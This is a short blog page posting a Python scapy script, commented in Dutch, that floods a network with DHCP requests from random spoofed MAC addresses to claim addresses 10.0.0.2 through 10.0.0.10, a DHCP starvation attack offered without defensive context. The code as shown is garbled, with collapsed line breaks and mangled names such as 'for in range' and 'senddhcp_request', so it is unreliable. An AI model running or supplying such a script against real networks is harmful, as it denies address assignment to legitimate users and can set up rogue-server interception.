top of page

dhcp python script

#!/usr/bin/env python# Aangepast script met DHCP-verzoeken# (Shreyas Damle's script als inspiratie)import timefrom scapy.all import *

 

def main():    layer2_broadcast = "ff:ff:ff:ff:ff:ff"    conf.checkIPaddr = False  # Stop scapy from checking return packet originating from any packet that we have sent out

 

    IP_address_subnet = "10.0.0."    network_interface = "eth0"  # Pas dit aan naar de juiste interface-naam op jouw systeem

 

    def send_dhcp_request(ip):        bogus_mac_address = RandMAC()        dhcp_request = Ether(src=bogus_mac_address, dst=layer2_broadcast) / IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) / BOOTP(chaddr=bogus_mac_address) / DHCP(options=[("message-type", "request"), ("server_id", "10.0.0.1"), ("requested_addr", IP_address_subnet + str(ip)), "end"])        sendp(dhcp_request, iface=network_interface)        print("Requesting: " + IP_address_subnet + str(ip) + "\n")        time.sleep(1)

 

    for ip in range(2, 11):  # Verzoek adressen van 10.0.0.2 tot 10.0.0.10        for in range(5):  # Herhaal 5 keer            senddhcp_request(ip)

 

if name == "__main__":    main()

5 views0 comments

Recent Posts

See All

Openbaar Ministerie

Datum: 04 – 04 - 2024 Betreft: Data Weledelgestrenge Heer/Vrouw, Enkele maanden geleden heb ik reeds het initiatief genomen om per brief contact met u op te nemen, met de vraag een onderzoek in te ste

Comments


bottom of page